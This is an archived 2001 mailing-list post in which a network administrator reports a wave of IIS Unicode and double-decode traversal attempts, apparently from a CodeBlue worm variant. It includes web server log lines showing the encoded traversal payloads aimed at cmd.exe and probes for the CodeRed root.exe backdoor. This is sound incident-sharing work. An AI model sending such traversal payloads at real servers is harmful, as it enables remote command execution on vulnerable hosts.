Greetings, I am suddenly seeing hundreds of Unicode traversal requests coming in from all over the world, many of them from previous CodeRed victims. I am guessing someone changed CodeBlue to make it spread faster, because before I saw maybe 1 or 2 CodeBlue attempts a day, and so far i've seen at least 20 in the last hour. Just a a way to help fingerprint it, a few of the attempted exploits use the multiple decode vulnerability.... -Gary- 12.27.232.252 - - [18/Sep/2001:10:16:47 -0400] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 287 "-" "-" 12.27.232.252 - - [18/Sep/2001:10:16:48 -0400] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 285 "-" "-" 12.27.232.252 - - [18/Sep/2001:10:16:48 -0400] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 295 "-" "-" 12.27.232.252 - - [18/Sep/2001:10:16:49 -0400] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 295 "-" "-" 12.27.232.252 - - [18/Sep/2001:10:16:49 -0400] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309 "-" "-" 12.27.232.252 - - [18/Sep/2001:10:16:50 -0400] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 326 "-" "-" 12.27.232.252 - - [18/Sep/2001:10:16:50 -0400] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 326 "-" "-" 12.27.232.252 - - [18/Sep/2001:10:16:50 -0400] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/sy stem32/cmd.exe?/c+dir HTTP/1.0" 404 342 "-" "-" 12.27.232.252 - - [18/Sep/2001:10:16:51 -0400] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308 "-" "-" 12.27.232.252 - - [18/Sep/2001:10:16:52 -0400] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308 "-" "-" 12.27.232.252 - - [18/Sep/2001:10:16:52 -0400] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308 "-" "-" 12.27.232.252 - - [18/Sep/2001:10:16:56 -0400] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308 "-" "-" 12.27.232.252 - - [18/Sep/2001:10:16:56 -0400] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 292 "-" "-" 12.27.232.252 - - [18/Sep/2001:10:17:00 -0400] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 292 "-" "-" 12.27.232.252 - - [18/Sep/2001:10:17:00 -0400] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309 "-" "-" 12.27.232.252 - - [18/Sep/2001:10:17:01 -0400] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309 "-" "-" Gary Portnoy Network Administrator gportnoyat_private PGP Fingerprint: 9D69 6A39 642D 78FD 207C 307D B37D E01A 2E89 9D2C ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
This archive was generated by hypermail 2b30 : Tue Sep 18 2001 - 08:20:52 PDT